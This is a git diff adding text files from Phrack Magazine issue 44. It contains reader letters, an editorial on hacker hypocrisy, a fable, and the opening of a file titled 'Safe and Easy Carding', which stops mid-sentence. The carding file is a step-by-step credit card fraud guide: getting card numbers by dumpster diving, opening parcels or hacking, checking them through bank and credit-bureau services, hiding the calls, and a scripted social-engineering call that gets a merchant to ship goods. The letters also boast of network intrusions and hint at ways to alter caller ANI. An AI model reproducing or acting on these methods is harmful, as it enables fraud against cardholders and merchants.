++598-2-421994             named Alex a.k.a L0neW0lf )
++1-2019394543           Fastrax
++1-2019397597             |||
++1-2019398448             |||
++1-2014607022             |||
++1-2014609523             |||
++1-7183975413           The Pit
++1-7183975532             |||
++1-7183975520             |||
++1-7183975442             |||
++1-7185074605             |||
++1-3133832116           Pirates Heaven ( The best SysOp I've seen: Nitro)
++1-7166554940           The Edge
++39-744302593           Temple Of Gurus ( Tecn[0]brains WHQ ) SysOp: POWS/TCB
++39-744305366                              |    |    |
++39-744305547                              |    |    |
++39-238003442           Asylum BBS
++39-24500837            Pier BBS Node 0
++39-24582105               |||   Node 1
+
+Excuse me for the awful list (I am on many others BBS too !!!!) and
+note the my handle is usually _/ane but my real Identity/Handle is
+PLiNi0 iL VeCCHi0 and the Location I used to write is GReeNiSLaND (because
+the second-name that usually identify the Island of Ischia where I live
+with my parents: Ischia is a island located in middle Naples's Bay near
+the Island of Capri)... so I like to be called as
+PLiNi0 iL VeCCHi0 / uNiTeD PHReHaCKeRS oF GReeNiSLaND  or best -u-.-P-.-G-
+
+My best works come in Unix Environment on BSD 4.x , Ultrix , SunOs and
+Multimax of Encore Corporation: I hacked the Italtel Network, the National
+Council of Research best known in Italy as C.N.R. or CNR, and many host
+at University of Naples, Rome, Salerno and Venice... Starting by Italtel
+Telematica in Milan I was at point of hack the HQ of AT&T in Bruxelles
+because many users of Italtel Telematica in Milan worked in AT&T too...
+but to get some examination at University (Like Fisics II and Cibernetica)
+I must abandon this k()()l work (but I'm interested to restart at AT&T).
+
+So in the -= Phrack 42 =- I read this as follow:
+
+/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
+||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
+\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
+
+In the same number of Phrack Magazine I read about TheNewHacker in North Italy
+(in Torino) that was interested to get in contact with hackers. Ok, maybe I
+was a little hacker, but I stay in South Italy ( I am located in Island of
+Ischia, near Napoli, U know !!!)... Anyway if U can give my E-mail address to
+TheNewHacker and give me the E-mail of TheNewHacker I will be so glad too...
+I was interested in contributing to write for a compilation file on the hacking
+scenes in Italy and France too (I have a friend that works at MATRA-ESPACE
+for ESA best known as European Spazial Agency located in Toulouse). So lemme
+known if I can help Your Magazine with my contributions and/or my work.
+
+A last thing ....
+        can You, Dear Erik Bloodaxe, give me some Internet address of BBS or
+        FTP Sites with Underground Stuff or any kind of other K()()l stuff ?!
+        (P.S. Can I get Phrack Magazine via FTP at any sites ?!??!)
+
+[Hey man, Thanks a lot for the BBS list.  I don't really call BBSes much, but
+ I'm sure our readers will get a lot of use out of them!
+
+ About writing files, GO FOR IT!  We always need files.  Feel free to send us
+ anything you have written and want to publish!
+
+ I will forward your info on to TheNewHacker in Italy.  Maybe you two can
+ take Italy by storm.  Haha!
+
+ Phrack's FTP site is ftp.netsys.com.  All issues can be found there.
+ also zero.cypher.com has a lot of files for ftp.]
+
+-------------------------------------------------------------------------------
+
+Hi.  I've been spending all my free time reading through phreaker files and
+all of the old Phracks.  And, I was wondering if you are still there???
+
+If so, I need your help!  Here's the story:
+
+On August 3, 1993 I was indicted on charges that my company attempted to rip
+AT&T off of nearly $2MM in 1991.  They say we started a 900# and went around
+the country calling it from Pay Telephones.
+
+They say that we went to a truck stop in Oregon and called the number 43,000+
+times racking up an $800,000+ phone bill.
+
+They claim that computers were probably used, although I have seen no
+evidence of that.
+
+These pay telephones are those AT&T Black Phones; you know, the ones in the
+airports.   They are owned by AT&T, built by AT&T, designed by AT&T, and even
+billed to AT&T.
+
+The evidence consists of nothing more than ANI reports.  Some phone bills to
+back them up, but for the majority of it, they are using only ANI.  Now, we
+all know that any can be blocked by having the operator get you a call.  And
+it can be changed by dialing 0, having her get you 1-800-321-0288, then
+having the toll free call be made.  In some areas, 900 calls
+slipped through that way, but it would be pretty hard to do 43,000 times.
+
+My point is, there are probably flaws with ANI.  Someone who knows what they
+are doing may possibly be able to block or change ANI.  Or maybe these calls
+were never put through.  Maybe someone got into the CO, etc...
+
+What I need is someone who has knowledge of possible flaws with AT&T's
+theory.  Enough that could give reasonable doubt and appear as an expert
+witness or point out where we could find someone.
+
+If you know of someone who might be able to help, please respond.  My
+INTERNET ID is NOFRIENDS@AOL.COM or I have set up a FAX @ 1-800-572-4403.
+
+Remaining,
+  NOFRIENDS
+
+
+[43000?  Like a 43 and 3 zeros?  Jesus.  That's a lot of calls.  I really
+ don't understand how they can be charging you with something hey say
+ was done from a payphone.  Do they have pictures of you at the phone
+ making the calls?  Sounds like a load of crap and any lawyer should be
+ able to get the charges dropped based on such flimsy evidence.
+
+ As far as there being a problem with ANI, I don't think that's an issue.
+ I've never heard of anything like this happening in the past, but there
+ always could be a first time.  Something is obviously amiss, but my gut
+ reaction is that the Phone Company is lying about there being such records.
+
+ Get a lawyer and demand the records be turned over during discovery.  Then
+ maybe you can see what you are up against.  GET A LAWYER!@#]
+
+-------------------------------------------------------------------------------
+
+Hi, I'd like to subscribe to Phrack and all upcoming issues (44+). Thanks.
+BTW, when is 44 scheduled for?
+
+Ciao,
+spirit-hex@prometheus.mtlnet.org
+
+PS: My board carries all PHRACK issues. I have around 4000 *quality* text
+files on my system. It's called operation prometheus at 514-735-4340. do you
+think you could post a small ad. for it in your magazine? We have FTP
+access/150 Usenet news/Internet accounts for members, ect.. (2 nodes at 14,400
+baud). Thanks!
+
+[There you go!]
+
+-------------------------------------------------------------------------------
+
+Hey, if you are having problems with people breaking the registration
+agreement as outlined in your last couple issues of Phrack. i may be able
+to help, and then I may not. My neighbor is a good friend, and fraud
+investigator. She is aware of my hobbies one of which involves Phrack. She
+thinks it is really neat what I am able to do with computers / modem. I am
+speaking somewhat candidly here but I am sure that you are smart enough to
+get my point. Well she handles some stuff like the David Koresh thing
+and helping the ATF/FBI with other cases. She likes the stuff that is too
+complicated for the FBI, all in all she does the investigating and puts it
+into words that the FBI, ATF, USDJ, SS, Dept of Treasury/IRS can
+understand, so they can make an arrest. All in all what i am trying to say
+is I may be able to pass the word on down the line to her about these
+people breaking the copyright law now effective on Phrack magazine. If you
+would like my help on this subject, just for the simple fact she loves to
+do this stuff, and phrack is a regularly read magazine by myself. If you
+would like maybe something can be done to these hypocrites that value laws,
+and get people arrested for the same stuff that they are currently doing
+by not registering Phrack. Just let me know if you want to try to push it.
+I will get together w/ her and see what can be done. Hopefully she will
+just ask for names and get an investigation started. Never can tell tho.
+
+L8r Sparky
+
+[I hope to God that I never have to go through the legal nightmare of
+ trying to prove financial damages incurred by companies "pirating" phrack.
+
+ It would be somewhat interesting to use some big company as an example, and
+ embarrass everyone into submission, but I keep hoping that people will just
+ be HONEST.  Fuck, I may be a hacker, but I'm honest about it.
+
+ "Chris, have you broken into other people's computers?"
+ "Yes, yes I have."
+
+ "Company, do your people read Phrack without registering your subscriptions?"
+ "Uh, well, no, we used to read Phrack, uh, but we don't anymore."
+
+ You all suck.  You know who you are.  How can you live with yourselves?]
+
+-------------------------------------------------------------------------------
+
+If you don't already have the direct-dialup number for
+the student annex of the University of Adelaide for Phrack 44, here it is:
+
++61-8-223-2657
+
+there are eight 2400 baud modems, but at the moment one is dead.
+
+[Cool.  International University Dialups!
+
+ Our big US list is still being compiled, so everyone keep sending in
+ your school's dialups.  Its taking me forever to do this alone.]
+
+-------------------------------------------------------------------------------
+
+Hi Chris....
+
+Was thinking...seeing as you guys are in texas, how about an article on
+EDSNET ??
+
+(There are dialups down here to it, via INFONET)
+
+[If EDSNET is what I think it is, didn't it used to be called Pac*It Plus?
+
+ I had a scan of it a LOOOONG time ago when everyone used it to call
+ altger and tchh.  If anyone has a scan of it, or wants to do one, please
+ send it to Phrack!]
+
+-------------------------------------------------------------------------------
+
+So, what IS new in cyberspace? lyl libido
+
+[BILLY IDOL SPEAKS!  OHMIGOD...HE TALKED TO ME!  OH MY!  I THINK I'M GONNA
+ MESS UP MY PANTS!  BILLY IDOL!  OH GOD OH GOD OH GOD!  O H  M Y  G O D ! !
+
+ Whew.  Someone get the mop.
+
+ What's new?  Well, all kinds of people have jumped on the Express Lane
+ of the Information Highway and have tried to make a new name for themselves
+ by exploiting a concept they know nothing about purely as a marketing move.
+ Gotta love it.
+
+ Bob, I'll take Billy Idol in the Center Square to block...]
+
+-------------------------------------------------------------------------------
+
+Thought you guys at Phrack might be interested in this small phile, if you
+don't already have it.  It's simply a form letter to the FBI requesting
+all information they on file about you under the Freedom of Information
+Act and Privacy Act.  They MUST respond, by law, or they face legal
+penalties.  Traditionally what they do is ignore your request unless they
+think you have enough money to go to court (i.e, you work for the New York
+Times or something).
+
+Really enjoyed Phrack #43 (as usual) - keep up the good work!  (file follows
+signature)
+
+-------------------------------------------------------------------------
+Doug
+-----------------------------------------------------------------------
+PRIVACY ACT & FREEDOM OF INFORMATION ACT REQUEST
+
+Name
+Street Address
+City, State, Zip                                          Date
+
+Federal Bureau of Investigation
+Records Management Division - FOIA/PA Office
+9th & Pennsylvania Avenue NW
+Washington, DC 20535
+
+Gentlemen:
+
+This is a request under the provisions of both the Privacy Act
+(5 USC 552b) and the Freedom of Information Act (5 USC 522).
+This request is being made under both Acts.
+
+I hereby request one copy of any and all records about me or
+referencing me maintained by the FBI.  This includes (but should
+not be limited to) documents, reports, memoranda, letters,
+electronic files, database references, "do not file" files,
+photographs, audio tapes, videotapes, electronic or photographic
+surveillance, "june mail", mail covers, and other miscellaneous
+files, and index citations relating to me or referencing me in
+other files.
+
+My full name is:  __________________________
+My date of birth was:_______________________
+My place of birth was:______________________
+My social security number is:________________
+I have lived in these places:__________________________________
+_______________________________________________________________
+
+Other names, places, events, organizations, or other references
+under which you may find applicable
+records:_________________________________________________________
+_________________________________________________________________
+
+As you know, FOIA/PA regulations provide that even if some
+requested material is properly exempt from mandatory disclosure,
+all segregable portions must be released.  If the requested
+material is released with deletions, I ask that each deletion be
+marked to indicate the exemption(s) being claimed to authorize
+each particular withholding.  In addition, I ask that your
+agency exercise its discretion to release any records which may
+be technically exempt, but where withholding serves no important
+public interest.
+
+I hereby agree to pay reasonable costs associated with this
+request up to a maximum of $25 without my additional approval.
+However, I strongly request a fee waiver because this is, in
+part, a Privacy Act request.
+
+This letter and my signature have been certified by a notary
+public as marked below.
+
+Sincerely,
+
+
+_______________________________
+
+requester's signature
+
+______________________________            ___________________________
+
+requester's printed name                  notary stamp and signature
+
+
+[Anyone who thinks they might be suspected of something might want to
+ fill this out.  Its not a bad idea.  If YOU DON'T think you are under
+ some kind of investigation, you probably shouldn't.  No reason to give
+ them any leads.]
+
+ -------------------------------------------------------------------------------
+
+         "We at Phrack welcome constructive criticism, but at least
+          have the nerve to email directly, rather than hide behind
+          an anonymous remailer.  That way, someone could have
+          responded to you in a more direct and expeditious manner."
+
+While I agree with your general analysis of the intelligence of that
+reader, I have to take exception to your disparaging of the anonymous service.
+The anonymous service takes flak from many people constantly, but usually it
+is from reactionary establishment types, and it's not what I expect
+from phrack.
+
+Anonymous communications have many purposes other than the sender lacking
+"nerve".  The "the only reason to use anon mail is because you are a coward
+and can't stand up for what you say" argument sounds remarkably similar to
+the "the only reason to use cryptography is because you are a criminal and
+have something to hide" argument.
+
+No doubt many criminals use cryptography and no doubt many spineless cowards
+use anon mail, but to disparage someone for using anon mail is similar to
+disparaging someone for using cryptography: even if it is in this case
+accurate, it spreads the misconception that there are only "dishonest"
+reasons to use these things. As someone with great respect for privacy
+that allows me to see the legitimate (and necessary to a free and
+democratic society) use of both secure and private communications, and
+anonymous communications, I know that this is not the case.  I will not list
+legitimate uses of anonymous mail for you, because they are much the arguments
+for cryptography, and no doubt you know all of these.  But a possibility is
+that the person involved would have his job/professional connections
+threatened if some people knew that he read Phrack and sympathized with it.
+Just a possibility, but if it is not true in this case it is surely easy
+to believe it is true in others.
+
+Sure, for those of us who can easily get a million email accounts from
+various places in any pseudonym we want, anonymous mail is unnecessary.
+But a legitimate and secure (and respected) way to send the occasional
+anonymous message is much preferable to (possibly illegal) deception and fraud.
+
+So, in short, even though the reader in question may indeed have been a
+spineless coward (not to mention whining nitwit), to insult him for his
+use of the anonymous server is harmful to the cause of anonymous mail,
+a cause which has few supporters and many disparagers, and a cause which
+the operators of the anonymous server in Finland should be commended for.
+Secure anonymous mail (which really doesn't quite exist yet, actually),
+like secure encryption, is something necessary and good for a free
+society and, and should not be disparaged.
+
+[Yes, you are 100% right.  I really didn't mean to dis the anonymous
+ mail service as a whole, I just wanted to rag on the butthead who
+ sent me an anonymous piece of hate-mail.
+
+ I personally don't use, nor have a need to use, the anonymous mailers,
+ but I know a lot of people do.  They DO provide a much needed service to
+ a lot of people, and you are right they should be commended on a job well
+ done.
+
+ However, if someone wants to send me some kind of shitty piece of mail,
+ get a pair of balls and show yourself.  If you are so unsure of your comments
+ that you need to hide, then your point must not be very valid.]
+
+-------------------------------------------------------------------------------
+
+"Jurassic Punk" T-shirts are now available from your phriends at CYBERPUNK
+SYSTEM.  These 100% cotton shirts are black, with artwork on the front
+with the words "A subculture 5,120 years in the making."
+
+Underneath the letter are bitstreams "11010001011101".  On the back, in white
+is "Attitude is everything."  Allegedly similar in design to the Jurassic
+Park logo.
+
+     Shirt               $15 ea
+     Cap                 $15 ea
+     Color Decals        $1 ea
+
+Please include $3 per item for shipping and handling, $5 if overseas.  Allow
+3-4 weeks for delivery.
+
+     CYBERPUNK SYSTEM
+     P.O. Box 771072
+     Wichita, KS  67277-1072
+
+Legacy@cpu.cyberpnk1.sai.com
+
+****** STILL AVAILABLE ******
+
+     On May 24 1992, two lone Pirates, Legacy of CyberPunk System, and Captain
+Picard of Holodeck, had finally had enough of AT&T.  Together, they traveled
+to the AT&T Maintenance Facility, just west of Goddard, Kansas, and claimed
+the property in the name of Pirates and Hackers everywhere.  They hoisted the
+Jolly Roger skull and crossbones high on the AT&T flagpole, where it stayed
+for 2 days until it was taken down by security.
+
+This event was photographed and videotaped by dGATOBAS Productions, to
+preserve this landmark in history.  And now you can witness the event.
+For a limited time we are offering a 11" x 17" full color poster of the
+Jolly Roger Pirate flag flying high over AT&T, with the AT&T logo in plain
+view, with the caption; "WE CAME, WE SAW, WE CONQUERED."
+
+Also available, by request is a 20" x 30" full color poster, and a cotton
+T-shirt with the same full color picture on the front.
+
+Prices:
+
+11" x 17" Full Color poster...........................$10 US
+20" x 30" Full Color photograph.......................$20 US
+T-Shirt with picture on front.........................$20 US
+
+If you are interested in purchasing any of the above items, simply send check
+or money order for the amount, plus $3 US per item for postage and handling
+to:
+
+     CYBERPUNK SYSTEM
+     P.O. Box 771072
+     Wichita, KS  67277-1072
+
+Be sure to specify size on T-shirt.
+
+A GIF of this is also available from CyberPunk System, 1:291/19 (FidoNet),
+47:617/0 (VUARNet), 93:3316/0 (PlatinumNet),  69:2316/0 (CCi).  FREQ magicname
+PIRATE.  Also available uuencoded, send mail to Legacy@cpu.cyberpnk1.sai.com
+
+[God bless the free enterprise system!
+ God bless capitalism!
+ God bless America!]
+
+-------------------------------------------------------------------------------
+
+I am unhappy to say that UPi now has dropped writing the magazine from
+this point on.  The reason is because Arch Bishop and myself do not have the
+time to get everyone to write their articles, sort the magazine out, etc, etc.
+This does not mean the group is dead, that is not true.  The group is still
+alive, but all future releases will be sent to Phrack for publication but under
+the UPI name.
+
+If you want to get a list of all the current sites and members of UPI you
+can finger my internet account to get the list.  If you want any of the phone
+number(s) for the sites, or you have any questions or anything else to say
+you can drop us a line.  Anyways I guess that's it for now.  ttyl
+
+The Lost Avenger/UPI
+Internet: mstone@nyx.cs.du.edu
+Voice Mailbox: 416-505-8636
+
+[Phrack appreciates this offer to donate your files to us!  We're sorry to
+ hear that your mag won't be continuing, but I know what a pain in the
+ ass it is to put out a magazine.  It SUCKS!  It's a time consuming
+ thankless task.  But what the hell, I'm stupid, and I have NO LIFE!  Hehe.]
+
+***************************************************************************
+
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Four, File 2a of 27
+
+                                   Editorial
+
+****************************************************************************
+
+
+This is going to piss people off, but hell, that's the point of having
+an editorial, eh?
+
+This issue I'd like to address something running rampant in our
+community:  HYPOCRACY.  I never really paid much attention to it, until
+the "Hacking At The End Of The Universe" conference in Amsterdam.
+
+The phrase "Information Wants to be Free," almost cliche by now, was
+heard screaming from nearly every speaker's mouth.  It underlie in the
+tone of the whole proceedings.  Everyone was either bitching about how
+this should be free, or that should be available, or it shouldn't be
+illegal to do some particular act, or they were fervently offering their
+support of these ideals.
+
+Granted, Holland has a notoriously permissive and open society; and
+indeed, Europe in general is far more laid back than the States, but
+even many in the US hold these ideals close to heart.
+
+One of the first things that pissed me off was the hundred guilder
+entrance fee.  That's fifty dollars!  Just to get in.  On top of
+that one had to pay for a tent, sleeping bag, mattress and food.  I have
+no problems with paying a fee, but this was Hack-Tic charging.  One of
+the biggest proponents of "Information Wants to be Free!"
+
+Obviously YOUR information wants to be free, but theirs costs a hundred
+guilders.
+
+Even more shocking was the fact that nearly every session involving some
+kind of "technology" was geared around a Hack-Tic product:  the
+Demon Dialer (tm), their POCSAG demodulator, their forthcoming
+spread spectrum lan adapter, or the magazine itself.  Were these free?
+Were the information behind their design provided so would-be
+technoweenies could run right home and break out the soldering iron?
+Fuck no.  Again, Hack-Tic's information is valuable, and YOU must PAY
+for the luxury of viewing it.  Unlike XYZ Corporation's information,
+whose R & D or Financials (which might bring someone a hefty "finder's
+fee") so desperately wants to be free of its magnetic bonds and spread
+all the way to YOUR hard drive.
+
+I don't want to rag on Hack-Tic too much.  I mean, throwing a conference
+costs a shitload of money, and I have a GREAT deal of respect for them
+for actually pulling off something so monumental.  I just want to put
+things in perspective.  The major cons in America (HoHo, Scon) really don't
+charge.  They "ask" for donations.  Sure, you might get a nasty look if
+you don't cough up five or ten bucks, but hell, everyone does.  They
+WANT to.  A good time is worth a handfull of change.  And there isn't
+some awesome requirement just to get in the damn door.  Besides, losses
+can always be made up by selling a plethora of crap such as t-shirts and
+videos, which everyone always wants to buy.  (Hardware costs.  :) )
+
+Shifting back to America:  2600.  Again, "Information Wants to be Free!"
+E. Goldstein, huge proponent of the slogan.  Uh, do you pay five bucks
+an issue?  I do.  So, 2600's information isn't quite so eager to be free
+either, I guess.  But, again, it does cost money to print a magazine
+like that, like it does to throw a conference, so certainly everyone can
+understand people trying to recap one's losses in a worthwhile project,
+right?
+
+Enter LOD Communications BBS Archive Project.  The community went
+apeshit when thirty nine dollars was asked for the entire results
+of the project.  LOD?  Asking for MONEY?  FOR INFORMATION???
+INFORMATION WANTS TO BE FREE!!!#!@$  That's disgusting!
+
+But wait, I thought charging a little bit to try to recap losses
+(equipment, phone calls, disks, postage, TIME) was ok?  "Oh sure it is
+dude, just not for you."  Oh how silly of me.  Of course!  Thanks for
+setting me straight on that issue.
+
+Then there was Phrack.  Always free to the community.  Always available
+for everyone's enjoyment.  Asking only that Corporate types pay a
+registration fee of a hundred dollars just to keep them honest.  (They
+aren't.)  Knowing full well that they are stealing it, sometimes quite
+brazenly.  Resting quietly, knowing that they are just as unethical as
+they ever claimed us to be.
+
+We make no bones about money here.  Our information is just as valuable
+as anyone's (probably more so) and is vastly more voluminous.  Hell,
+Issue 43 was probably bigger than every Hack-Tic and almost every
+2600 combined.  And, wait a minute, could it be?  Free?  Oh my god!  So
+it is.  Free in both cost and access.
+
+Let me tell you something.  Information does not want to be free, my
+friends.  Free neither from its restraints nor in terms of dollar value.
+Information is a commodity like anything else.  More valuable than the
+rarest element, it BEGS to be hoarded and priced.  Anyone who gives
+something away for nothing is a moron.  (I am indeed stupid.)  I can't
+fault anyone for charging as long as they don't try to rationalize their
+reasoning behind a facade of excuses, all the while shouting "Information
+Wants to be Free!"
+
+Trade secrets don't want to be free, marketing projections don't want to
+be free, formulas don't want to be free, troop placements don't want to
+be free, CAD designs do not want to be free, corporate financial
+information doesn't want to be free, my credit report sure as hell
+doesn't want to be free!
+
+Let's take a step back:  how to use a system IS information that should
+be proliferated, how computers network IS information that should be
+spread, new technologies WANT to be explained, holes ought to be pointed
+out, bug patches NEED to be free...note the difference?
+
+I'll end my rant with another piece of flawed logic.  At HEU a debate
+raged on about why phone calls should be free.  Hey, I love a toll-fraud
+device as much as the next guy (blue box tones still make me cry), and
+I've used more codes in my life than a million warez couriers and I make
+no bones about it...I fucking stole service!  Yippee!  Arrest me!
+
+The argument stated "The lines are already there, so why should I have
+to pay to use an unused line?"  Ok, fine, you don't...but you DO have
+to pay for laying fiber, designing switch generic upgrades, ATM
+research, compression and filtering algorithm design, video dial tone,
+daily maintenance, directory assistance, operator service or any of the
+hundreds of other things your old fee would go towards.  Don't like that
+argument?  Fine, the tents at HEU were already there and the seats had
+been layed out and were unused...get me my hundred guilders refunded.
+
+-----------------------------------------------------------------------------
+
+Once upon a time a Pig, a Cat, a Dog, and a Little Red Hen lived together
+in a little house.  The Pig, the Cat, and the Dog were all very lazy.
+The Little Red Hen had to do everything around the house by herself.
+
+All the Pig, the Cat, and the Dog wanted to do was play.
+
+One day, as the Little Red Hen was raking in the yard, she found some
+seeds.  "Who will help me plant these grains of wheat?"  she asked.
+
+"Not I," said the Pig.
+
+"Not I," said the Cat.
+
+"Not I," said the Dog.
+
+"Then I will do it myself," said the Little Red Hen.  And she did.
+
+Soon the wheat grew tall and golden.  "Who will help me cut the wheat?"
+asked the Little Red Hen.
+
+"Not I," said the Pig.
+
+"Not I," said the Cat.
+
+"Not I," said the Dog.
+
+"Then I will do it myself," said the Little Red Hen.  And she did.
+
+When the grain was cut and ready to be ground into flour, the Little Red
+Hen asked, "Who will help me take the grain to the mill?"
+
+"Not I," said the Pig.
+
+"Not I," said the Cat.
+
+"Not I," said the Dog.
+
+"Then I will do it myself," said the Little Red Hen.  And she did.
+
+When the flour came back from the mill, the Little Red Hen asked, "Who
+will help me bake the bread?"
+
+"Not I," said the Pig.
+
+"Not I," said the Cat.
+
+"Not I," said the Dog.
+
+"Then I will do it myself," said the Little Red Hen.  And she did.
+
+She made the flour into dough, and rolled the dough, and put it in the
+oven.  When the bread was baked, she took it out of the oven.
+Mmmmmmmmmm!  Didn't it smell good!
+
+"Who will help me eat this bread?" asked the Little Red Hen.
+
+"I will," said the Pig.
+
+"I will," said the Cat.
+
+"I will," said the Dog.
+
+"Oh, no, you won't!" said the Little Red Hen.  "I found the seeds.  I
+planted them.  I harvested the grain and took it to the mill.  I made
+the flour into bread.  I did the work by myself, and now I am going to
+eat the bread--all by myself."
+
+And she did.
+
+Think back to your childhood...didn't we learn ANYTHING?
\ No newline at end of file
diff --git a/phrack44/20.txt b/phrack44/20.txt
new file mode 100644
index 0000000..f0b9674
--- /dev/null
+++ b/phrack44/20.txt
@@ -0,0 +1,387 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Four, File 20 of 27
+
+[** NOTE:  The following file is presented for informational and
+           entertainment purposes only.  Phrack Magazine takes NO
+           responsibility for anyone who attempts the actions
+           described within. **]
+
+****************************************************************************
+
+SSSSS AAAAA FFFFF EEEEE     AAAAA N    N DDDD      EEEEE AAAAA SSSSS Y   Y
+S     A   A F     E         A   A NN   N D   D     E     A   A S      Y Y
+SSSSS AAAAA FFF   EEE       AAAAA N N  N D   D     EEEEE AAAAA SSSSS   Y
+    S A   A F     E         A   A N  N N D   D     E     A   A     S   Y
+SSSSS A   A F     EEEEE     A   A N    N DDDD      EEEEE A   A SSSSS   Y
+
+ CCCCCCCC  AAAAAAAA  RRRRRRRR  DDDDDDD   IIIIIIII  NN     NN  GGGGGGGG
+ CC        AA    AA  RR    RR  DD    DD     II     NNNN   NN  GG
+ CC        AA    AA  RR   RR   DD    DD     II     NN  N  NN  GG
+ CC        AAAAAAAA  RRRRRR    DD    DD     II     NN   N NN  GG  GGGG
+ CC        AA    AA  RR   RR   DD    DD     II     NN    NNN  GG    GG
+ CCCCCCCC  AA    AA  RR    RR  DDDDDDD   IIIIIIII  NN     NN  GGGGGGGG
+
+                                 BY
+
+                              VaxBuster
+
+
+    This file is ONLY to be published in Phrack, and has not and
+ will not be released, or published in any other magazine.
+
+    And a disclaimer: I do not engage in, or condone ANY illegal
+ activity, including credit card fraud, and this article should
+ be used for INFORMATIONAL PURPOSES ONLY.  Those wishing to
+ engage in unlawful activities should be warned that there are
+ severe penalties that exist that could render the remainder of
+ your life useless.
+
+    In the past few years, I have had a ton of people come up and
+ ask, "I want to card something, but I'm afraid I'll get caught
+ because I don't really know what I'm doing, can u give me tips?"
+ This article is designed for those people, people who already
+ have carded and are looking for better/easier ways to do it.
+ One point you'll see me address VERY strongly in this article
+ is safety.  I don't want to see any of my friends end up in
+ jail.  See, like any unlawful activity, you are going to have
+ certain risks, and this article is designed to ELIMINATE those
+ risks, or narrow them down tremendously.  I'm going to take
+ you step by step through the ENTIRE process from the time you
+ pick up the phone until the time you are safely at home
+ reading the manual to your new toy.
+
+
+Stage One - Getting the credit card information
+
+    Getting the information is probably going to be the easiest of all
+the steps involved here.  You could go trashing at your local restaurant,
+retail store, or bank.  You could open up Federal Express boxes and find
+them there.  You could hack into an establishment and get them from there.
+
+    It doesn't really matter HOW you get it, but you want to make sure
+you get the person's full name, their complete credit card number, their
+expiration, and hopefully an address.  In the event that you found the
+credit card number locally and just have the name, check your local White
+Pages for their address or use a service like Compuserve to pull up their
+address.  You'll probably find that the address closest to the store is the
+right one.  Also, if you can get a hold of the issuing bank, this will help.
+
+Stage Two - Verifying the credit card information
+
+    There are several ways you can do this.  And remember when you are
+doing this that it would be VERY helpful to get the available line of credit.
+
+ 1> If you have the issuing bank, call the bank and ask for their
+    AUTOMATED CREDIT SERVICE.  They ALL have them.  Its an 800 number
+    and it's printed on the back of the card.  Basically, this service
+    is set up so that credit card holders can check their available
+    balance, available credit, etc.  Usually, they have SOME kind of
+    security that prevents the normal person from walking up and
+    typing in someone else's number.  This security is lame.  You
+    either have to know the last 4 digits of their social security
+    number or their zip code.  99 times out of 100, you'll find that
+    you'll need their zip code though.
+
+ 2> So you don't have the issuing bank? Just use a credit card verifier
+    with a merchant number. Don't place a HUGE purchase, it can be any
+    amount, so make it small, like say $8.31 or something.
+
+ 3> Use a 800 porn service that accepts credit cards.
+
+ 4> Use a credit bureau like CBI, TRW, or InfoAM.  These services
+    are very nice because you can easily check their available
+    credit line.  It also has other information that could be useful.
+
+    Remember, when you are doing this, don't make the calls from your
+house, and if it's impossible to do otherwise, go through a divertor and a
+code.  Put a couple of levels of protection between YOU and them.  This
+will cut down on any tracks leading back to you.
+
+Stage Three - Finding the company
+
+    You are looking for a relatively small company - one that has
+what you need in stock, but not one that needs operators to answer calls.
+Most places (even retail stores like Radio Shack) will ship out to anyone
+any place in the US.  Just tell them you are handicap, or can't get around
+very well, and they will be more than happy to help.  You want to find a
+place that has Federal Express.  And of course, you're looking for one
+that accepts the type of card that you have.  Incidentally, for those who
+are VERY new at this :
+
+    If first digit of card is a:
+
+                    3 American Express (15 digits)
+                    4 Visa             (13 or 16 digits)
+                    5 Mastercard       (16 digits)
+                    6 Discover         (16 digits)
+
+Stage Four - Placing the call
+
+    Ok, before we go any further, make sure you have a call back number.
+I use a VMB that is in the local area that I'm supposedly calling from.
+You should almost always be calling for a business, because companies treat
+businesses better than your standard customer.  Tell them you need to have
+the products the VERY next day, and if they can't have it to you by then,
+tell them you'll find another company (Hell, who wants to wait? :) )
+When you call them, just relax, and pretend like your just placing an order
+for yourself, nothing is out of the ordinary, but you just need to start
+that special project in the morning.  Make sure you have all the information
+in front of you.  Call during business hours, not on Friday, Saturday, or
+Sunday.  Here's a transcript of one of my calls:
+
+    "Hello XXX, this is Mark can I help you?" (always get their name)
+
+    "Yes, My name is Joe and I'm calling from XXX, I'd like to place
+     an order."
+
+    "Ok sir, I'd more than happy to help you, let me get some info
+     from you first.  Ok. Can I have your name?"
+
+    "Joseph XXX"
+
+    "Your address, Joe?"
+
+    "XXXX XXXX lane, and thats in XXXXXXX XX, the zip there is XXXXX"
+
+    "Ok, and a number where we can reach you if there is any problems?"
+
+    "XXX-XXX-XXXX"
+
+    "Ok, what would you like to order?"
+
+    "I need four of those laser jet printers, I believe I spoke with
+     someone on Friday about them, and the part number is XXXXX-XX.
+     Also, I had a question on those printers too, what type of
+     warranty do they carry?" (Always ask about warranty!)
+
+    "Well sir, these particular models have one year parts and labor
+     warranty.  You can buy an additional 5 year warranty for only
+     $49 a piece too.  We have an unconditional guarantee of 90 days."
+
+    "Ok, I'll take the 5 year warranty on all of them then."
+
+    "Do you need any toner cartridges, or printer paper?"
+
+    "No, all I need are the printers."
+
+    "Ok, how would you like these shipped?"
+
+    "You have Federal Express, right?"
+
+    "Yeah."
+
+    "Ok, Ship them PRIORITY overnight then."
+
+    "Ok, and how are you paying for your order?"
+
+    "With our corporate XXXXXX card."
+
+    "Ok, can I have your account number?"
+
+    "Sure its XXXX-XXXX-XXXX-XXXX"
+
+    "Ok, and the Billing information is the same as your ship to
+     address ?"
+
+    "Thats right."
+
+    "Ok, then this package will go out today, and you'll have the
+     printers by tomorrow morning."
+
+    "Ok, and can you do me a favor?"
+
+    "Sure."
+
+    "Whenever your shipping department ships the package, get the
+     Federal Express Tracking Number for me, and leave it on my
+     Voice Mail System?"
+
+    "Sure, I'll do that personally later on tonight."
+
+    "Ok. Thank you very much."
+
+    "Thank YOU sir."
+
+    Ok - a few things I want to mention.  First, try to determine what type
+of credit card authorization they have.  If its retail store, they probably
+just have ZION terminals, just the standard type or swipe style.  These don't
+check the address, or anything, just to make sure the card is valid and
+has enough credit left.  The other type check all the info, including the
+name and address.  Its very important that you are SHIPPING to the BILLING
